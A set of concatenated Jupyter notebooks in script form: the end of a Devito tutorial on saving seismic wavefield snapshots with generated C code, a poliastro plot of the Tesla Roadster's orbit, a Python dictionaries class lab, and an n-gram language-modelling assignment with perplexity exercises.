# We want to get equally spaced snaps from the `nt-2` saved in `u.data`. The user can then define the total number of snaps `nsnaps`, which determines a `factor` to divide `nt`.
nsnaps = 100
factor = round(u.shape[0] / nsnaps) # Get approx nsnaps, for any nt
ucopy = u.data.copy(order='C')
filename = "naivsnaps.bin"
file_u = open(filename, 'wb')
for it in range(0, u.shape[0], factor):
file_u.write(ucopy[it, :, :])
file_u.close()
# Checking `u.data` spaced by `factor` using matplotlib,
# +
#NBVAL_IGNORE_OUTPUT
plt.rcParams['figure.figsize'] = (20, 20) # Increases figure size
imcnt = 1 # Image counter for plotting
plot_num = 5 # Number of images to plot
for i in range(0, nsnaps, int(nsnaps/plot_num)):
plt.subplot(1, plot_num+1, imcnt+1)
imcnt = imcnt + 1
plt.imshow(np.transpose(u.data[i * factor, :, :]))
plt.show()
# -
# Or from the saved file:
#
# +
#NBVAL_IGNORE_OUTPUT
fobj = open("naivsnaps.bin", "rb")
snaps = np.fromfile(fobj, dtype = np.float32)
snaps = np.reshape(snaps, (nsnaps, vnx, vnz)) #reshape vec2mtx, devito format. nx first
fobj.close()
plt.rcParams['figure.figsize'] = (20,20) # Increases figure size
imcnt = 1 # Image counter for plotting
plot_num = 5 # Number of images to plot
for i in range(0, nsnaps, int(nsnaps/plot_num)):
plt.subplot(1,plot_num+1, imcnt+1);
imcnt = imcnt + 1
plt.imshow(np.transpose(snaps[i,:,:]))
plt.show()
# -
# This C/FORTRAN way of saving snaps is clearly not optimal when using Devito; the wavefield object `u` is specified to save all snaps, and a memory copy is done at every `op` time step. Giving that we don't want all the snaps saved, this process is wasteful; only the selected snapshots should be copied during execution.
#
#
# To address these issues, a better way to save snaps using Devito's capabilities is presented in the following section.
# # Saving snaps to disk - Devito method
#
# A better way to save snapshots to disk is to create a new `TimeFunction`, `usave`, whose time size is equal to
# `nsnaps`. There are 3 main differences from the previous code, which are flagged by `#Part 1`, `#Part 2` and `#Part 3` . After running the code each part is explained with more detail.
# +
#NBVAL_IGNORE_OUTPUT
from devito import ConditionalDimension
nsnaps = 100 # desired number of equally spaced snaps
factor = round(nt / nsnaps) # subsequent calculated factor
print(f"factor is {factor}")
#Part 1 #############
time_subsampled = ConditionalDimension(
't_sub', parent=model.grid.time_dim, factor=factor)
usave = TimeFunction(name='usave', grid=model.grid, time_order=2, space_order=2,
save=(nt + factor - 1) // factor, time_dim=time_subsampled)
print(time_subsampled)
#####################
u = TimeFunction(name="u", grid=model.grid, time_order=2, space_order=2)
pde = model.m * u.dt2 - u.laplace + model.damp * u.dt
stencil = Eq(u.forward, solve(pde, u.forward))
src_term = src.inject(
field=u.forward,
expr=src * dt**2 / model.m,
offset=model.nbl)
rec_term = rec.interpolate(expr=u, offset=model.nbl)
#Part 2 #############
op1 = Operator([stencil] + src_term + rec_term,
subs=model.spacing_map) # usual operator
op2 = Operator([stencil] + src_term + [Eq(usave, u)] + rec_term,
subs=model.spacing_map) # operator with snapshots
op1(time=nt - 2, dt=model.critical_dt) # run only for comparison
op2(time=nt - 2, dt=model.critical_dt)
#####################
#Part 3 #############
print("Saving snaps file")
print("Dimensions: nz = {:d}, nx = {:d}".format(nz + 2 * nb, nx + 2 * nb))
filename = "snaps2.bin"
usave.data.tofile(filename)
#####################
# -
# As `usave.data` has the desired snaps, no extra variable copy is required. The snaps can then be visualized:
# +
#NBVAL_IGNORE_OUTPUT
fobj = open("snaps2.bin", "rb")
snaps = np.fromfile(fobj, dtype=np.float32)
snaps = np.reshape(snaps, (nsnaps, vnx, vnz))
fobj.close()
plt.rcParams['figure.figsize'] = (20, 20) # Increases figure size
imcnt = 1 # Image counter for plotting
plot_num = 5 # Number of images to plot
for i in range(0, nsnaps, int(nsnaps/plot_num)):
plt.subplot(1,plot_num+1, imcnt+1);
imcnt = imcnt + 1
plt.imshow(np.transpose(snaps[i,:,:]))
plt.show()
# -
# ## About Part 1
#
# Here a subsampled version (`time_subsampled`) of the full time Dimension (`model.grid.time_dim`) is created with the `ConditionalDimension`. `time_subsampled` is then used to define an additional symbolic wavefield `usave`, which will store in `usave.data` only the predefined number of snapshots (see Part 2).
#
# Further insight on how `ConditionalDimension` works and its most common uses can be found in [the Devito documentation](https://www.devitoproject.org/devito/dimension.html#devito.types.dimension.ConditionalDimension). The following excerpt exemplifies subsampling of simple functions:
#
# Among the other things, ConditionalDimensions are indicated to implement
# Function subsampling. In the following example, an Operator evaluates the
# Function ``g`` and saves its content into ``f`` every ``factor=4`` iterations.
#
# >>> from devito import Dimension, ConditionalDimension, Function, Eq, Operator
# >>> size, factor = 16, 4
# >>> i = Dimension(name='i')
# >>> ci = ConditionalDimension(name='ci', parent=i, factor=factor)
# >>> g = Function(name='g', shape=(size,), dimensions=(i,))
# >>> f = Function(name='f', shape=(size/factor,), dimensions=(ci,))
# >>> op = Operator([Eq(g, 1), Eq(f, g)])
#
# The Operator generates the following for-loop (pseudocode)
# .. code-block:: C
# for (int i = i_m; i <= i_M; i += 1) {
# g[i] = 1;
# if (i%4 == 0) {
# f[i / 4] = g[i];
# }
# }
#
# From this excerpt we can see that the C code generated by `Operator` with the extra argument `Eq(f,g)` mainly corresponds to adding an `if` block on the optimized C-code, which saves the desired snapshots on `f`, from `g`, at the correct times. Following the same line of thought, in the following section the symbolic and C-generated code are compared, with and without snapshots.
#
# # About Part 2
#
# We then define `Operator`s `op1` (no snaps) and `op2` (with snaps). The only difference between the two is that `op2` has an extra symbolic equation `Eq(usave, u)`. Notice that even though `usave` and `u` have different Dimensions, Devito's symbolic interpreter understands it, because `usave`'s `time_dim` was defined through the `ConditionalDimension`.
#
# Below, we show relevant excerpts of the compiled `Operators`. As explained above, the main difference between the optimized C-code of `op1` and `op2` is the addition of an `if` block. For `op1`'s C code:
# ```c
# // #define's
# //...
#
# // declare dataobj struct
# //...
#
# // declare profiler struct
# //...
#
# int Kernel(struct dataobj *restrict damp_vec, const float dt, struct dataobj *restrict m_vec, const float o_x, const float o_y, struct dataobj *restrict rec_vec, struct dataobj *restrict rec_coords_vec, struct dataobj *restrict src_vec, struct dataobj *restrict src_coords_vec, struct dataobj *restrict u_vec, const int x_M, const int x_m, const int y_M, const int y_m, const int p_rec_M, const int p_rec_m, const int p_src_M, const int p_src_m, const int time_M, const int time_m, struct profiler * timers)
# {
# // ...
# // ...
#
# float (*restrict u)[u_vec->size[1]][u_vec->size[2]] __attribute__ ((aligned (64))) = (float (*)[u_vec->size[1]][u_vec->size[2]]) u_vec->data;
# // ...
#
# for (int time = time_m, t0 = (time)%(3), t1 = (time + 1)%(3), t2 = (time + 2)%(3); time <= time_M; time += 1, t0 = (time)%(3), t1 = (time + 1)%(3), t2 = (time + 2)%(3))
# {
# struct timeval start_section0, end_section0;
# gettimeofday(&start_section0, NULL);
# for (int x = x_m; x <= x_M; x += 1)
# {
# #pragma omp simd
# for (int y = y_m; y <= y_M; y += 1)
# {
# float r0 = 1.0e+4F*dt*m[x + 2][y + 2] + 5.0e+3F*(dt*dt)*damp[x + 1][y + 1];
# u[t1][x + 2][y + 2] = 2.0e+4F*dt*m[x + 2][y + 2]*u[t0][x + 2][y + 2]/r0 - 1.0e+4F*dt*m[x + 2][y + 2]*u[t2][x + 2][y + 2]/r0 + 1.0e+2F*((dt*dt*dt)*u[t0][x + 1][y + 2]/r0 + (dt*dt*dt)*u[t0][x + 2][y + 1]/r0 + (dt*dt*dt)*u[t0][x + 2][y + 3]/r0 + (dt*dt*dt)*u[t0][x + 3][y + 2]/r0) + 5.0e+3F*(dt*dt)*damp[x + 1][y + 1]*u[t2][x + 2][y + 2]/r0 - 4.0e+2F*dt*dt*dt*u[t0][x + 2][y + 2]/r0;
# }
# }
# gettimeofday(&end_section0, NULL);
# timers->section0 += (double)(end_section0.tv_sec-start_section0.tv_sec)+(double)(end_section0.tv_usec-start_section0.tv_usec)/1000000;
# struct timeval start_section1, end_section1;
# gettimeofday(&start_section1, NULL);
# for (int p_src = p_src_m; p_src <= p_src_M; p_src += 1)
# {
# //source injection
# //...
# }
# gettimeofday(&end_section1, NULL);
# timers->section1 += (double)(end_section1.tv_sec-start_section1.tv_sec)+(double)(end_section1.tv_usec-start_section1.tv_usec)/1000000;
# struct timeval start_section2, end_section2;
# gettimeofday(&start_section2, NULL);
# for (int p_rec = p_rec_m; p_rec <= p_rec_M; p_rec += 1)
# {
# //receivers interpolation
# //...
# }
# gettimeofday(&end_section2, NULL);
# timers->section2 += (double)(end_section2.tv_sec-start_section2.tv_sec)+(double)(end_section2.tv_usec-start_section2.tv_usec)/1000000;
# }
# return 0;
# }
# ```
# `op2`'s C code (differences are highlighted by `//<<<<<<<<<<<<<<<<<<<<`):
# ```c
# // #define's
# //...
#
# // declare dataobj struct
# //...
#
# // declare profiler struct
# //...
#
# int Kernel(struct dataobj *restrict damp_vec, const float dt, struct dataobj *restrict m_vec, const float o_x, const float o_y, struct dataobj *restrict rec_vec, struct dataobj *restrict rec_coords_vec, struct dataobj *restrict src_vec, struct dataobj *restrict src_coords_vec, struct dataobj *restrict u_vec, struct dataobj *restrict usave_vec, const int x_M, const int x_m, const int y_M, const int y_m, const int p_rec_M, const int p_rec_m, const int p_src_M, const int p_src_m, const int time_M, const int time_m, struct profiler * timers)
# {
# // ...
# // ...
#
# float (*restrict u)[u_vec->size[1]][u_vec->size[2]] __attribute__ ((aligned (64))) = (float (*)[u_vec->size[1]][u_vec->size[2]]) u_vec->data;
# //<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<DECLARE USAVE<<<<<<<<<<<<<<<<<<<<<
# float (*restrict usave)[usave_vec->size[1]][usave_vec->size[2]] __attribute__ ((aligned (64))) = (float (*)[usave_vec->size[1]][usave_vec->size[2]]) usave_vec->data;
# //<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
#
# //flush denormal numbers...
#
# for (int time = time_m, t0 = (time)%(3), t1 = (time + 1)%(3), t2 = (time + 2)%(3); time <= time_M; time += 1, t0 = (time)%(3), t1 = (time + 1)%(3), t2 = (time + 2)%(3))
# {
# struct timeval start_section0, end_section0;
# gettimeofday(&start_section0, NULL);
# for (int x = x_m; x <= x_M; x += 1)
# {
# #pragma omp simd
# for (int y = y_m; y <= y_M; y += 1)
# {
# float r0 = 1.0e+4F*dt*m[x + 2][y + 2] + 5.0e+3F*(dt*dt)*damp[x + 1][y + 1];
# u[t1][x + 2][y + 2] = 2.0e+4F*dt*m[x + 2][y + 2]*u[t0][x + 2][y + 2]/r0 - 1.0e+4F*dt*m[x + 2][y + 2]*u[t2][x + 2][y + 2]/r0 + 1.0e+2F*((dt*dt*dt)*u[t0][x + 1][y + 2]/r0 + (dt*dt*dt)*u[t0][x + 2][y + 1]/r0 + (dt*dt*dt)*u[t0][x + 2][y + 3]/r0 + (dt*dt*dt)*u[t0][x + 3][y + 2]/r0) + 5.0e+3F*(dt*dt)*damp[x + 1][y + 1]*u[t2][x + 2][y + 2]/r0 - 4.0e+2F*dt*dt*dt*u[t0][x + 2][y + 2]/r0;
# }
# }
# gettimeofday(&end_section0, NULL);
# timers->section0 += (double)(end_section0.tv_sec-start_section0.tv_sec)+(double)(end_section0.tv_usec-start_section0.tv_usec)/1000000;
# //<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<SAVE SNAPSHOT<<<<<<<<<<<<<<<<<<<<<
# if ((time)%(60) == 0)
# {
# struct timeval start_section1, end_section1;
# gettimeofday(&start_section1, NULL);
# for (int x = x_m; x <= x_M; x += 1)
# {
# #pragma omp simd
# for (int y = y_m; y <= y_M; y += 1)
# {
# usave[time / 60][x + 2][y + 2] = u[t0][x + 2][y + 2];
# }
# }
# //<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
# gettimeofday(&end_section1, NULL);
# timers->section1 += (double)(end_section1.tv_sec-start_section1.tv_sec)+(double)(end_section1.tv_usec-start_section1.tv_usec)/1000000;
# }
# struct timeval start_section2, end_section2;
# gettimeofday(&start_section2, NULL);
# for (int p_src = p_src_m; p_src <= p_src_M; p_src += 1)
# {
# //source injection
# //...
# }
# gettimeofday(&end_section2, NULL);
# timers->section2 += (double)(end_section2.tv_sec-start_section2.tv_sec)+(double)(end_section2.tv_usec-start_section2.tv_usec)/1000000;
# struct timeval start_section3, end_section3;
# gettimeofday(&start_section3, NULL);
# for (int p_rec = p_rec_m; p_rec <= p_rec_M; p_rec += 1)
# {
# //receivers interpolation
# //...
# }
# gettimeofday(&end_section3, NULL);
# timers->section3 += (double)(end_section3.tv_sec-start_section3.tv_sec)+(double)(end_section3.tv_usec-start_section3.tv_usec)/1000000;
# }
# return 0;
# }
#
# ```
# To inspect the full codes of `op1` and `op2`, run the block below:
# +
def print2file(filename, thingToPrint):
import sys
orig_stdout = sys.stdout
f = open(filename, 'w')
sys.stdout = f
print(thingToPrint)
f.close()
sys.stdout = orig_stdout
# print2file("op1.c", op1) # uncomment to print to file
# print2file("op2.c", op2) # uncomment to print to file
# print(op1) # uncomment to print here
# print(op2) # uncomment to print here
# -
# To run snaps as a movie (outside Jupyter Notebook), run the code below, altering `filename, nsnaps, nx, nz` accordingly:
# +
#NBVAL_IGNORE_OUTPUT
#NBVAL_SKIP
# Current cell requires ffmpeg module in order to produce and save the animation
def animateSnaps2d(nsnaps, snapsObj):
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from matplotlib import animation, rc
# Set up formatting for the movie files
Writer = animation.writers['ffmpeg']
# fps: 20 bitrate: 16000
writer = Writer(fps=20, metadata=dict(artist='Me'), bitrate=16000)
from IPython.display import HTML
base_matrix = np.transpose(snapsObj[0, :, :])
def update(i):
base_matrix = np.transpose(snapsObj[i, :, :])
matrice.set_array(base_matrix)
fig, ax = plt.subplots()
matrice = ax.matshow(base_matrix)
plt.colorbar(matrice)
plt.xlabel('x')
plt.ylabel('z')
plt.title('Modelling one shot over a 2-layer velocity model with Devito.')
# A file named `snapshotting.mp4` is saved in the current directory.
ani = animation.FuncAnimation(fig, update, frames=nsnaps, interval=500)
plt.show()
HTML(ani.to_html5_video())
ani._repr_html_() is None
rc('animation', html='html5')
ani
ani.save('snapshotting.mp4', writer=writer)
filename = "naivsnaps.bin"
nsnaps = 100
fobj = open(filename, "rb")
snapsObj = np.fromfile(fobj, dtype=np.float32)
snapsObj = np.reshape(snapsObj, (nsnaps, vnx, vnz))
fobj.close()
anim = animateSnaps2d(nsnaps, snapsObj)
# -
# # References
#
# <NAME>., <NAME>., <NAME>., <NAME>., <NAME>., <NAME>., & <NAME>. (2017). Full-waveform inversion, Part 1: Forward modeling. The Leading Edge, 36(12), 1033-1036.
|
examples/seismic/tutorials/08_snapshotting.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Visualizing the SpaceX Tesla Roadster trip to Mars
# +
from astropy.time import Time
from astropy.coordinates import solar_system_ephemeris
solar_system_ephemeris.set("jpl")
from poliastro.bodies import *
from poliastro.twobody import Orbit
from poliastro.plotting import OrbitPlotter, plot
EPOCH = Time("2018-02-18 12:00:00", scale="tdb")
# +
import callhorizons
from astropy.coordinates import ICRS, CartesianRepresentation, CartesianDifferential
from poliastro.frames import HeliocentricEclipticJ2000
def get_roadster_orbit(epoch):
# Get orbital data
roadster = callhorizons.query("SpaceX Roadster", smallbody=False)
roadster.set_discreteepochs([epoch.jd])
roadster.get_elements(center="500@10")
# Create Orbit object to do conversions
roadster_eclip = Orbit.from_classical(
Sun,
roadster['a'][0] * u.au,
roadster['e'][0] * u.one,
roadster['incl'][0] * u.deg,
roadster['node'][0] * u.deg,
roadster['argper'][0] * u.deg,
roadster['trueanomaly'][0] * u.deg,
epoch
)
# Convert to ICRS
roadster_eclip_coords = HeliocentricEclipticJ2000(
x=roadster_eclip.r[0], y=roadster_eclip.r[1], z=roadster_eclip.r[2],
v_x=roadster_eclip.v[0], v_y=roadster_eclip.v[1], v_z=roadster_eclip.v[2],
representation=CartesianRepresentation,
differential_type=CartesianDifferential,
obstime=epoch
)
roadster_icrs_coords = roadster_eclip_coords.transform_to(ICRS)
roadster_icrs_coords.representation = CartesianRepresentation
# Create final orbit
roadster_icrs = Orbit.from_vectors(
Sun,
r=[roadster_icrs_coords.x, roadster_icrs_coords.y, roadster_icrs_coords.z] * u.km,
v=[roadster_icrs_coords.v_x, roadster_icrs_coords.v_y, roadster_icrs_coords.v_z] * (u.km / u.s),
epoch=epoch
)
return roadster_icrs
# -
roadster = get_roadster_orbit(EPOCH)
roadster
from poliastro.plotting import plot_solar_system
frame = plot_solar_system(outer=False, epoch=EPOCH)
frame.plot(roadster, label="SpaceX Roadster", color='k')
# +
from poliastro.plotting import OrbitPlotter3D
from plotly.offline import init_notebook_mode
init_notebook_mode(connected=True)
# +
frame = OrbitPlotter3D()
frame.plot(Orbit.from_body_ephem(Earth), label=Earth)
frame.plot(Orbit.from_body_ephem(Mars), label=Mars)
frame.plot(roadster, label="SpaceX Roadster", color='black')
frame.set_view(30 * u.deg, -100 * u.deg, 2 * u.km)
frame.show()
|
docs/source/examples/Visualizing the SpaceX Tesla Roadster trip to Mars.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # In-Class Coding Lab: Dictionaries
#
# The goals of this lab are to help you understand:
#
# - How to use Python Dictionaries
# - Basic Dictionary methods
# - Dealing with Key errors
# - How to use lists of Dictionaries
# - How to encode / decode python dictionaries to json.
#
# ## Dictionaries are Key-Value Pairs.
#
# The **key** is unique for each Python dictionary object and is always of type `str`. The **value** stored under the key can be any Python type.
#
# This example creates a `stock` variable with two keys `symbol` and `name`. We access the dictionary key with `['keyname']`.
stock = {} # empty dictionary
stock['symbol'] = 'AAPL'
stock['name'] = 'Apple Computer'
print(stock)
print(stock['symbol'])
print(stock['name'])
# While Python lists are best suited for storing multiple values of the same type ( like grades ), Python dictionaries are best suited for storing hybrid values, or values with multiple attributes.
#
# In the example above we created an empty dictionary `{}` then assigned keys `symbol` and `name` as part of individual assignment statements.
#
# We can also build the dictionary in a single statement, like this:
stock = { 'name' : 'Apple Computer', 'symbol' : 'AAPL', 'value' : 125.6 }
print(stock)
print("%s (%s) has a value of $%.2f" %(stock['name'], stock['symbol'], stock['value']))
# ## Dictionaries are mutable
#
# This means we can change their value. We can add and remove keys and update the value of keys. This makes dictionaries quite useful for storing data.
# +
# let's add 2 new keys
print("Before changes", stock)
stock['low'] = 119.85
stock['high'] = 127.0
# and update the value key
stock['value'] = 126.25
print("After change", stock)
# -
# ## Now you Try It!
#
# Create a python dictionary called `car` with the following keys `make`, `model` and `price`. Set appropriate values and print out the dictionary.
#
# TODO: Write code here
car = {'make' : 'Ford', 'model' : 'Ford Fusion', 'price' : 47389}
print(car)
# ## What Happens when the key is not there?
#
# Let's go back to our stock example. What happens when we try to read a key not present in the dictionary?
#
# The answer is that Python will report a `KeyError`
print( stock['change'] )
# No worries. We know how to handle run-time errors in Python... use `try except` !!!
try:
print( stock['change'] )
except KeyError:
print("The key 'change' does not exist!")
# ## Avoiding KeyError
#
# You can avoid `KeyError` using the `get()` dictionary method. This method will return a default value when the key does not exist.
#
# The first argument to `get()` is the key to get, the second argument is the value to return when the key does not exist.
print(stock.get('name','no key'))
print(stock.get('change', 'no key'))
# ## Now You try It!
#
# Write a program to ask the user to input a key for the `stock` variable.
#
# If the key exists, print the value, otherwise print 'Key does not exist'
# +
# TODO: write code here
user_input = input("Enter a key for stock varible: ")
print(stock.get(user_input, 'Key does not exist'))
# -
# ## Enumerating keys and values
#
# You can enumerate keys and values easily, using the `keys()` and `values()` methods:
# +
print("KEYS")
for k in stock.keys():
print(k)
print("VALUES")
for v in stock.values():
print(v)
# -
# ## List of Dictionary
#
# The List of Dictionary object in Python allows us to create useful in-memory data structures. It's one of the features of Python that sets it apart from other programming languages.
#
# Let's use it to build a portfolio (list of 4 stocks).
# +
portfolio = [
{ 'symbol' : 'AAPL', 'name' : 'Apple Computer Corp.', 'value': 136.66 },
{ 'symbol' : 'AMZN', 'name' : 'Amazon.com, Inc.', 'value': 845.24 },
{ 'symbol' : 'MSFT', 'name' : 'Microsoft Corporation', 'value': 64.62 },
{ 'symbol' : 'TSLA', 'name' : 'Tesla, Inc.', 'value': 257.00 }
]
print("first stock", portfolio[0])
print("name of first stock", portfolio[0]['name'])
print("last stock", portfolio[-1])
print("value of 2nd stock", portfolio[1]['value'])
# -
# ## Putting It All Together
#
# Write a program to build out your personal stock portfolio.
#
# ```
# 1. Start with an empty list, called portfolio
# 2. loop
# 3. create a new stock dictionary
# 3. input a stock symbol, or type 'QUIT' to print portfolio
# 4. if symbol equals 'QUIT' exit loop
# 5. add symbol value to stock dictionary under 'symbol' key
# 6. input stock value as float
# 7. add stock value to stock dictionary under 'value key
# 8. append stock variable to portfolio list variable
# 9. time to print the portfolio: for each stock in the portfolio
# 10. print stock symbol and stock value, like this "AAPL $136.66"
# ```
# +
portfolio = []
while True:
symbol = input("Enter a stock symbol or type quit: ")
if symbol == 'quit':
print(portfolio)
break
else:
value = float(input("Enter stock value: "))
stock = {'symbol' : symbol, 'value' : value}
portfolio.append(stock)
print(symbol, "$", value)
# -
|
content/lessons/10/Class-Coding-Lab/CCL-Dictionaries.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# Lab 3: Language Modeling
# =============
# In this problem set, your objective is to train a language model, evaluate it and explore how it can be used for language generation. Towards that end you will:
#
# - Train an n-gram language model.
# - Use that language model to generate representative sentences.
# - Study the effect of training data size, and language model complexity (n-gram size), on the modeling capacity of a language model.
#
# - **For this assignment, submit ```lab3.py``` on Gradescope.**
# - In order to test the lab you can run ```python run_tests.py``` or ```python run_tests.py -j``` (more detailed information)
# - In order to install the correct dependencies you can run ```pip install -r requirements.txt```
#
# Total points: 90 points
# # 0. Setup
#
# In order to develop this assignment, you will need [python 3.6](https://www.python.org/downloads/) and the following libraries. Most if not all of these are part of [anaconda](https://www.continuum.io/downloads), so a good starting point would be to install that.
#
# - [jupyter](http://jupyter.readthedocs.org/en/latest/install.html)
# - [nosetests](https://nose.readthedocs.org/en/latest/)
# - [nltk](https://www.nltk.org)
#
# Here is some help on installing packages in python: https://packaging.python.org/installing/. You can use ```pip --user``` to install locally without sudo. We have also provided a requirements.txt file with the correct packages and their respective versions, so you can also run ```pip install -r requirements.txt``` to install the correct dependencies
import sys
from importlib import reload
from collections import defaultdict
import lab3
# +
print('My Python version')
print('python: {}'.format(sys.version))
# -
import nose
import nltk
# +
print('My library versions')
print('nose: {}'.format(nose.__version__))
print('nltk: {}'.format(nltk.__version__))
# -
# To test whether your libraries are the right version, run:
#
# `nosetests tests/test_environment.py`
# ! nosetests tests/test_environment.py
# # 1. Training a language model
#
# Let us first train a 3-gram language model. We need a monolingual corpus, which we will get using nltk.
#
# Total: 40 points
# Let us first extract from nltk's reuters corpus, 2 corpora in 2 different domains (here, subject areas), the food industry and the natural resources industry.
# +
import nltk
food = ['barley', 'castor-oil', 'cocoa', 'coconut', 'coconut-oil', 'coffee', 'copra-cake', 'grain', 'groundnut', 'groundnut-oil', 'potato', 'soy-meal', 'soy-oil', 'soybean', 'sugar', 'sun-meal', 'sun-oil', 'sunseed', 'tea', 'veg-oil', 'wheat']
natural_resources = ['alum', 'fuel', 'gas', 'gold', 'iron-steel', 'lead', 'nat-gas', 'palladium', 'propane', 'tin', 'zinc']
corpus = nltk.corpus.reuters
food_corpus = corpus.raw(categories=food)
natr_corpus = corpus.raw(categories=natural_resources)
# + tags=["outputPrepend"]
print(food_corpus)
# -
# ## Tokenization
#
# Your first task is to tokenize the raw text into a list of sentences, which are in turn a list of words. No need for any other kind of preprocessing such as lowercasing.
#
# - **Deliverable 1.1**: Complete the function `lab3.tokenize`. (5 points)
# - **Test**: `tests/test_visible.py:test_d1_1_tk`
reload(lab3);
nltk.download('punkt')
food_corpus_tk = lab3.tokenize_corpus(food_corpus)
natr_corpus_tk = lab3.tokenize_corpus(natr_corpus)
# ## Padding
#
# Your second task is to pad your sentences with the start-of-sentence symbol `'<s>'` and end-of-sentence symbol `'</s>'`. These symbols are necessary to model the probability of words that usually start a sentence and those that usually end a sentence.
#
# - **Deliverable 1.2**: Complete the function `lab3.pad`. (5 points)
# - **Test**: `tests/test_visible.py:test_d1_2_pad`
reload(lab3);
food_corpus_tk_pd = lab3.pad_corpus(food_corpus_tk)
natr_corpus_tk_pd = lab3.pad_corpus(natr_corpus_tk)
# ## Train-Test Split
#
# Your third task is to split the corpora into train, for training the language model, and test, for testing the language model. We will go with the traditional 80% (train), 20% (test) split. The first `floor(0.8*num_of_tokens)` should constitute the training corpus, and the rest should constitute the test corpus.
#
# - **Deliverable 1.3**: Complete the function `lab3.split_corpus`. (5 points)
# - **Test**: `tests/test_visible.py:test_d1_3_spc`
reload(lab3);
food_corpus_tr, food_corpus_te = lab3.split_corpus(food_corpus_tk_pd)
natr_corpus_tr, natr_corpus_te = lab3.split_corpus(natr_corpus_tk_pd)
# + tags=[]
flat_list = [item for sublist in food_corpus_tr[0:2] for item in sublist]
# for i in range(len(flat_list)):
# print(food_corpus_tr[i])
# print(flat_list[i], end=" ")
# print("\nass\n")
print(food_corpus_tr[0:2])
print("\nass\n")
print(flat_list)
# -
word_list = []
for i in food_corpus_tr[0:2]:
word_list.extend(i)
print(word_list)
# ## Splitting into n-grams
#
# Your fourth task is to count n-grams in the text up to a specific order.
#
# - **Deliverable 1.4**: Complete the function `lab3.count_ngrams`. (20 points)
# - **Test**: `tests/test_visible.py:test_d1_4_cn`
reload(lab3);
food_ngrams, food_vocab = lab3.count_ngrams(food_corpus_tr, 3)
natr_ngrams, natr_vocab = lab3.count_ngrams(natr_corpus_tr, 3)
# ## Estimating n-gram probability
#
# Your last task in this part of the problem set is to estimate the n-gram probabilities p(w_i|w_{i-n+1}, w_{i-n+2}, .., w_{i-1}), with no smoothing. For the purposes of this exercise we will use the maximum likelihood estimate and perform no smoothing.
#
# - **Deliverable 1.5**: Complete the function `lab3.estimate`. (5 points)
# - **Test**: `tests/test_visible.py:test_d1_5_es`
reload(lab3);
# + tags=[]
print(lab3.estimate(food_ngrams, ['palm'], ['producer', 'of']))
print(lab3.estimate(natr_ngrams, ['basis'], ['tested', 'the']))
# -
# Application: the speech recognition task takes human voice as its input and outputs text. If the pronunciation of two words are similar, Language Model can help decide which word to choose!
print(food_ngrams[('there', 'is', 'no')])
print(food_ngrams[('their', 'is', 'no')])
# Given the count of 'there is no' and 'their is no', which word ('there' or 'their') is more likely to be taken as the output?
# Language Model is not only helpful in speech recogition, but text generation (*e.g.*, machine translation, summarization, image captioning), spelling correction and so on.
# ## Training a language model
#
# Now we will combine everything together and train our language model! One way to see what the language model has learned is to see the sentences it can generate.
#
# For the sake of simplicity, and for the purposes of later parts in this problem set, we use nltk's lm module to train a language model.
# +
from nltk.lm import Laplace
from nltk.lm.preprocessing import padded_everygram_pipeline
size_ngram = 3
food_train, food_vocab = padded_everygram_pipeline(size_ngram, food_corpus_tk[:int(0.8*len(food_corpus_tk))])
natr_train, natr_vocab = padded_everygram_pipeline(size_ngram, natr_corpus_tk[:int(0.8*len(natr_corpus_tk))])
food_test = sum([['<s>'] + x + ['</s>'] for x in food_corpus_tk[int(0.8*len(food_corpus_tk)):]],[])
natr_test = sum([['<s>'] + x + ['</s>'] for x in natr_corpus_tk[int(0.8*len(natr_corpus_tk)):]],[])
food_lm = Laplace(size_ngram)
natr_lm = Laplace(size_ngram)
food_lm.fit(food_train, food_vocab)
natr_lm.fit(natr_train, natr_vocab)
# -
reload(lab3);
# Now let's ask our language model to generate a sentence.
# This might take some time
n_words = 10
print(food_lm.generate(n_words, random_seed=3)) # random_seed makes the random sampling part of generation reproducible.
print(natr_lm.generate(n_words, random_seed=3))
# # 2. Evaluating a language model
#
# Next, we evaluate our language models using the perplexity measure, and draw conclusions on how a change of domains (here, subject areas) can affect the performance of a language model. Perplexity measures the language model capacity at predicting sentences in a test corpus.
#
# Total: 10 points
# - **Deliverable 2.1**: Complete the function `lab3.get_perplexity`. (10 points)
# - **Test**: `tests/test_visible.py:test_d2_1_gp`
reload(lab3);
# This might take some time
print(lab3.get_perplexity(food_lm, food_test[:5000]))
print(lab3.get_perplexity(food_lm, natr_test[:5000]))
print(lab3.get_perplexity(natr_lm, natr_test[:5000]))
print(lab3.get_perplexity(natr_lm, food_test[:5000]))
# - What observations can you make on the results? Is the domain shift affecting the performance of the language model? What are possible explanations?
#
# + [markdown] nbgrader={"grade": true, "grade_id": "cell-75755ce98e18d29b", "locked": false, "points": 10, "schema_version": 3, "solution": true, "task": false}
# **Your Observation**:
# -
# # 3. Data size and model complexity
#
# Let us now see how the size of the training data and the complexity of the model we choose affects the quality of our language model.
#
# Total: 40 points
# For this part we'd like to see the difference between a 2-gram model and a 3-gram model. Typically, with a larger n, the n-gram model gives us more information about the word sequence and has lower perplexity.
#
# For testing, we'll only be considering 5% instead of 20% of the test data for running time purposes.
#
# - **Deliverable 3.1**: Complete the function `lab3.vary_ngram`. (40 points)
# - **Test**: `tests/test_visible.py:test_d3_1_vary`
# + tags=[]
test_corpus = natr_corpus_tk[int(0.8*len(natr_corpus_tk)): int(0.85*len(natr_corpus_tk))][:2]
